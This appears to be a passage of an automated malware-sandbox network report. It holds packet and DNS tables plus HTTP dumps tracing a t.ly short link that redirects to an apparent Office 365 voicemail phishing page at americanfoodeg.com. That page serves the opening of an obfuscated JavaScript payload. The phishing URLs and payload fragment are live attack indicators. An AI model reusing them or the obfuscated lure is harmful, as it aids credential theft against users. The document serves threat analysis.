                                  Nov 12, 2024 16:42:25.290859938 CET49866443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.290870905 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.290896893 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.290965080 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.291095018 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.291918039 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.291929007 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.291955948 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.292053938 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.292056084 CET49866443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.292181015 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.292251110 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.292331934 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.292794943 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.292799950 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.292882919 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.292983055 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.293020964 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.293028116 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.293565035 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.293572903 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.293602943 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.293632030 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.293632030 CET49864443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.293642998 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.293652058 CET4434986413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.293798923 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.294442892 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.294799089 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.296268940 CET49869443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.296292067 CET4434986913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.296394110 CET49869443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.296487093 CET49869443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.296494007 CET4434986913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.335344076 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.339327097 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.339332104 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.339339972 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.420568943 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.420612097 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.420655966 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.420754910 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.420787096 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.420787096 CET49867443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.420799971 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.420808077 CET4434986713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.422550917 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.422609091 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.422734976 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.422898054 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.422898054 CET49868443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.422911882 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.422919989 CET4434986813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.423085928 CET49870443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.423104048 CET4434987013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.423196077 CET49870443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.423357010 CET49870443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.423368931 CET4434987013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.424621105 CET49871443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.424655914 CET4434987113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.424839020 CET49871443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.424931049 CET49871443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.424942970 CET4434987113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.427520037 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.427570105 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.427762032 CET49866443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.427762032 CET49866443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.427839041 CET49866443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.427846909 CET4434986613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.429496050 CET49872443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.429516077 CET4434987213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.429737091 CET49872443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.429737091 CET49872443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.429757118 CET4434987213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.466114998 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.466164112 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.466278076 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.466382980 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.466387987 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.466418028 CET49865443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.466422081 CET4434986513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.468132019 CET49873443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.468151093 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:25.468293905 CET49873443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.468332052 CET49873443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:25.468338013 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.170928001 CET4434987013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.171433926 CET49870443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.171452999 CET4434987013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.171879053 CET49870443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.171884060 CET4434987013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.210738897 CET4434987113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.210808039 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.211532116 CET49871443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.211532116 CET49871443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.211558104 CET4434987113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.211570024 CET4434987113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.211796999 CET49873443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.211812973 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.212208033 CET49873443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.212218046 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.302612066 CET4434987013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.302664042 CET4434987013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.303117037 CET49870443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.303117037 CET49870443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.303339005 CET49870443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.303355932 CET4434987013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.305541039 CET49874443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.305577040 CET4434987413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.305788040 CET49874443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.305788994 CET49874443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.305819035 CET4434987413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.347450018 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.347480059 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.347517967 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.347677946 CET49873443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.347677946 CET49873443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.348211050 CET49873443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.348221064 CET4434987313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.349972963 CET4434987113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.350066900 CET49875443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.350085020 CET4434987513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.350090981 CET4434987113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.350152016 CET49871443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.350152969 CET49875443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.350239992 CET49871443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.350253105 CET4434987113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.350286961 CET49875443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.350297928 CET4434987513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.352168083 CET49876443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.352185011 CET4434987613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.352283955 CET49876443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.352464914 CET49876443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.352474928 CET4434987613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.373658895 CET4434987213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.374099016 CET49872443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.374109983 CET4434987213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.374516010 CET49872443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.374520063 CET4434987213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.506974936 CET4434987213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.507016897 CET4434987213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.507236004 CET49872443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.507236004 CET49872443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.508212090 CET49872443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.508219957 CET4434987213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.509367943 CET49877443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.509406090 CET4434987713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:26.509516001 CET49877443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.509602070 CET49877443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:26.509617090 CET4434987713.107.246.45192.168.2.4
                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 12, 2024 16:41:04.138520002 CET53545741.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:04.140011072 CET53570091.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:05.406239033 CET53637591.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:05.662775993 CET6552353192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:05.662940979 CET5532553192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:05.670480967 CET53655231.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:05.673392057 CET53553251.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:07.024554968 CET6008653192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:07.025474072 CET5687853192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:07.339288950 CET53568781.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:07.339309931 CET53600861.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:08.173939943 CET5306653192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:08.175493956 CET5200653192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:08.180942059 CET53530661.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:08.182584047 CET53520061.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:08.544270992 CET5143853192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:08.547396898 CET5303553192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:08.555252075 CET53631961.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:08.591454983 CET53530351.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:08.610152006 CET53514381.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:09.962662935 CET6192953192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:09.963515043 CET5657853192.168.2.41.1.1.1
                                  Nov 12, 2024 16:41:09.997328997 CET53565781.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:10.004847050 CET53619291.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:10.905764103 CET53585091.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:19.890373945 CET138138192.168.2.4192.168.2.255
                                  Nov 12, 2024 16:41:22.721770048 CET53643231.1.1.1192.168.2.4
                                  Nov 12, 2024 16:41:41.595645905 CET53552941.1.1.1192.168.2.4
                                  Nov 12, 2024 16:42:03.535587072 CET53583861.1.1.1192.168.2.4
                                  Nov 12, 2024 16:42:04.018151045 CET53513391.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Nov 12, 2024 16:41:05.662775993 CET192.168.2.41.1.1.10x73e3Standard query (0)t.lyA (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:05.662940979 CET192.168.2.41.1.1.10x2435Standard query (0)t.ly65IN (0x0001)false
                                  Nov 12, 2024 16:41:07.024554968 CET192.168.2.41.1.1.10xac1aStandard query (0)gardenfresheg.com.americanfoodeg.comA (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:07.025474072 CET192.168.2.41.1.1.10x1ce2Standard query (0)gardenfresheg.com.americanfoodeg.com65IN (0x0001)false
                                  Nov 12, 2024 16:41:08.173939943 CET192.168.2.41.1.1.10x670fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:08.175493956 CET192.168.2.41.1.1.10x249dStandard query (0)www.google.com65IN (0x0001)false
                                  Nov 12, 2024 16:41:08.544270992 CET192.168.2.41.1.1.10x5465Standard query (0)gardenfresheg.comA (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:08.547396898 CET192.168.2.41.1.1.10x62daStandard query (0)gardenfresheg.com65IN (0x0001)false
                                  Nov 12, 2024 16:41:09.962662935 CET192.168.2.41.1.1.10x6b84Standard query (0)www.gardenfresheg.comA (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:09.963515043 CET192.168.2.41.1.1.10x16a2Standard query (0)www.gardenfresheg.com65IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 12, 2024 16:40:55.019239902 CET1.1.1.1192.168.2.40x7b16No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 12, 2024 16:40:55.019239902 CET1.1.1.1192.168.2.40x7b16No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:05.670480967 CET1.1.1.1192.168.2.40x73e3No error (0)t.ly104.20.6.133A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:05.670480967 CET1.1.1.1192.168.2.40x73e3No error (0)t.ly104.20.7.133A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:05.673392057 CET1.1.1.1192.168.2.40x2435No error (0)t.ly65IN (0x0001)false
                                  Nov 12, 2024 16:41:07.339309931 CET1.1.1.1192.168.2.40xac1aNo error (0)gardenfresheg.com.americanfoodeg.com192.185.17.40A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:08.180942059 CET1.1.1.1192.168.2.40x670fNo error (0)www.google.com172.217.18.100A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:08.182584047 CET1.1.1.1192.168.2.40x249dNo error (0)www.google.com65IN (0x0001)false
                                  Nov 12, 2024 16:41:08.610152006 CET1.1.1.1192.168.2.40x5465No error (0)gardenfresheg.com185.230.63.171A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:08.610152006 CET1.1.1.1192.168.2.40x5465No error (0)gardenfresheg.com185.230.63.186A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:08.610152006 CET1.1.1.1192.168.2.40x5465No error (0)gardenfresheg.com185.230.63.107A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:09.997328997 CET1.1.1.1192.168.2.40x16a2No error (0)www.gardenfresheg.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 12, 2024 16:41:09.997328997 CET1.1.1.1192.168.2.40x16a2No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 12, 2024 16:41:10.004847050 CET1.1.1.1192.168.2.40x6b84No error (0)www.gardenfresheg.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 12, 2024 16:41:10.004847050 CET1.1.1.1192.168.2.40x6b84No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 12, 2024 16:41:10.004847050 CET1.1.1.1192.168.2.40x6b84No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:53.458873987 CET1.1.1.1192.168.2.40x5786No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:53.458873987 CET1.1.1.1192.168.2.40x5786No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:41:58.464632034 CET1.1.1.1192.168.2.40xe708No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 12, 2024 16:41:58.464632034 CET1.1.1.1192.168.2.40xe708No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                  Nov 12, 2024 16:42:17.127113104 CET1.1.1.1192.168.2.40x8404No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 12, 2024 16:42:17.127113104 CET1.1.1.1192.168.2.40x8404No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                  • t.ly
                                  • gardenfresheg.com.americanfoodeg.com
                                  • https:
                                    • gardenfresheg.com
                                    • www.gardenfresheg.com
                                  • fs.microsoft.com
                                  • otelrules.azureedge.net
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449741104.20.6.1334435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:06 UTC652OUTGET /X0-7Q HTTP/1.1
                                  Host: t.ly
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-User: ?1
                                  Sec-Fetch-Dest: document
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-12 15:41:06 UTC807INHTTP/1.1 302 Found
                                  Date: Tue, 12 Nov 2024 15:41:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Cache-Control: public, max-age=600, stale-if-error=86400, stale-while-revalidate=600, no-store
                                  location: https://gardenfresheg.com.americanfoodeg.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ
                                  x-frame-options: SAMEORIGIN
                                  x-xss-protection: 1; mode=block
                                  x-content-type-options: nosniff
                                  x-whom: tly-app
                                  x-do-app-origin: 86336e98-11a6-477d-b2fb-e3113d9e1e21
                                  x-do-orig-status: 302
                                  Vary: Accept-Encoding
                                  CF-Cache-Status: MISS
                                  Server-Timing: cfCacheStatus;desc="MISS"
                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                  Server: cloudflare
                                  CF-RAY: 8e179fd34bbb2851-DFW
                                  alt-svc: h3=":443"; ma=86400
                                  2024-11-12 15:41:06 UTC562INData Raw: 34 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 67 61 72 64 65 6e 66 72 65 73 68 65 67 2e 63 6f 6d 2e 61 6d 65 72 69 63 61 6e 66 6f 6f 64 65 67 2e 63 6f 6d 2f 6d 2f 3f 63 33 59 39 62 7a 4d 32 4e 56 38 78 58 33 5a 76 61 57 4e 6c 4a 6e 4a 68 62 6d 51 39 55 30 64 73 61 31 64 74 57 54 30 6d 64 57 6c 6b 50 56 56 54 52 56 49 77 4e 6a 45 78 4d 6a 41 79 4e 46 55 78 4d 54 45 78 4d 44 59 77 4f 51 27 22 20 2f 3e 0a 0a 20 20 20
                                  Data Ascii: 4b7<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://gardenfresheg.com.americanfoodeg.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ'" />
                                  2024-11-12 15:41:06 UTC652INData Raw: 56 54 52 56 49 77 4e 6a 45 78 4d 6a 41 79 4e 46 55 78 4d 54 45 78 4d 44 59 77 4f 51 22 3e 68 74 74 70 73 3a 2f 2f 67 61 72 64 65 6e 66 72 65 73 68 65 67 2e 63 6f 6d 2e 61 6d 65 72 69 63 61 6e 66 6f 6f 64 65 67 2e 63 6f 6d 2f 6d 2f 3f 63 33 59 39 62 7a 4d 32 4e 56 38 78 58 33 5a 76 61 57 4e 6c 4a 6e 4a 68 62 6d 51 39 55 30 64 73 61 31 64 74 57 54 30 6d 64 57 6c 6b 50 56 56 54 52 56 49 77 4e 6a 45 78 4d 6a 41 79 4e 46 55 78 4d 54 45 78 4d 44 59 77 4f 51 3c 2f 61 3e 2e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 63 64 31 35 63 62 65 37 37 37 32 66 34 39 63 33 39 39 63 36 61
                                  Data Ascii: VTRVIwNjExMjAyNFUxMTExMDYwOQ">https://gardenfresheg.com.americanfoodeg.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ</a>. <script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a
                                  2024-11-12 15:41:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449744192.185.17.404435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:08 UTC756OUTGET /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ HTTP/1.1
                                  Host: gardenfresheg.com.americanfoodeg.com
                                  Connection: keep-alive
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-User: ?1
                                  Sec-Fetch-Dest: document
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-12 15:41:08 UTC405INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:41:08 GMT
                                  Server: Apache
                                  Upgrade: h2,h2c
                                  Connection: Upgrade, close
                                  Last-Modified: Sat, 09 Nov 2024 00:25:39 GMT
                                  Accept-Ranges: bytes
                                  Content-Length: 71120
                                  Cache-Control: max-age=7200
                                  Expires: Tue, 12 Nov 2024 17:41:08 GMT
                                  Vary: Accept-Encoding
                                  X-Newfold-Cache-Level: 2
                                  X-Endurance-Cache-Level: 2
                                  X-nginx-cache: WordPress
                                  Content-Type: text/html
                                  2024-11-12 15:41:08 UTC7787INData Raw: 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 7b 63 6f 6e 73 74 20 5f 30 78 31 39 32 32 66 32 3d 5f 30 78 31 39 32 32 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 30 32 33 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 30 32 33 31 61 2c 5f 30 78 34 65 34 38 38 30 29 7b 5f 30 78 33 30 32 33 31 61 3d 5f 30 78 33 30 32 33 31 61 2d 30 78 31 62 66 3b 6c 65 74 20 5f 30 78 32 62 32 30 37 65 3d 5f 30 78 31 39 32 32 66 32 5b 5f 30 78 33 30 32 33 31 61 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 32 30 37 65 3b 7d 2c 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 32 32 28 29 7b 63 6f 6e 73 74 20 5f 30 78
                                  Data Ascii: <script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x
